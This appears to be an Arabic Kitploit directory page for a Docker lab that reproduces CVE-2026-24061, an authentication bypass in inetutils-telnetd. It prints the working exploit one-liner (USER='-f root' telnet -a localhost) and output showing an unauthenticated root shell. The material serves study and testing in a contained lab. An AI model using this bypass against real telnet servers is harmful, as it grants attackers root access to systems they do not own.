Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
inetutils-telnetd-auth-bypass — مختبر دوكر صغير للتجربة مع cve-2026-24061، تجاوز المصادقة في inetutils-telnetd. | Kitploit
أدوات/GitHubGitHub/leonjza/inetutils-telnetd-auth-bypass
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالمصادقةمختبرات وتدريب عملي
GitHubleonjza/inetutils-telnetd-auth-bypass

inetutils-telnetd-auth-bypass

مختبر دوكر صغير للتجربة مع cve-2026-24061، تجاوز المصادقة في inetutils-telnetd.

عرض المستودع
125منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مختبر تجاوز المصادقة في inetutils-telnetd، CVE-2026-24061

مختبر صغير للتجربة مع تجاوز المصادقة في inetutils-telnetd الإصدار 1.9.3 - 2.7 كما تم الكشف عنه في القائمة البريدية oss-sec. [0]

تعتمد هذه الحاوية على حقيقة أن inetutils-telnetd لا يزال إصدارًا ضعيفًا في Debian 11 (Bullseye). في وقت إنشاء هذا، كان:

root@kitploit:~
root@ba8cc6858b87:/# apt search inetutils-telnetd
Sorting... Done
Full Text Search... Done
inetutils-telnetd/oldoldstable 2:2.0-1+deb11u2 arm64
  telnet server

البناء

استنسخ المستودع وقم ببناء الحاوية باستخدام docker build -t telnetd-exploit ..

التشغيل

قم بتشغيل الحاوية باستخدام docker run --rm -it telnetd-exploit. ستظهر لك رسالة تعرض إثبات المفهوم (PoC).

root@kitploit:~
docker run --rm -it telnetd-exploit
Starting internet superserver: inetd.
You are user1. Try telnet as root with: USER='-f root' telnet -a localhost
user1@114102afa5d3:/$

سيبدو التشغيل الناجح شيئًا كهذا:

root@kitploit:~
user1@114102afa5d3:/$ USER='-f root' telnet -a localhost
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Linux 6.17.8 (114102afa5d3) (pts/1)

Linux 114102afa5d3 6.17.8 #1 SMP PREEMPT Thu Nov 20 09:34:02 UTC 2025 aarch64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@114102afa5d3:~#

[0] https://seclists.org/oss-sec/2026/q1/89

تنزيل الأداة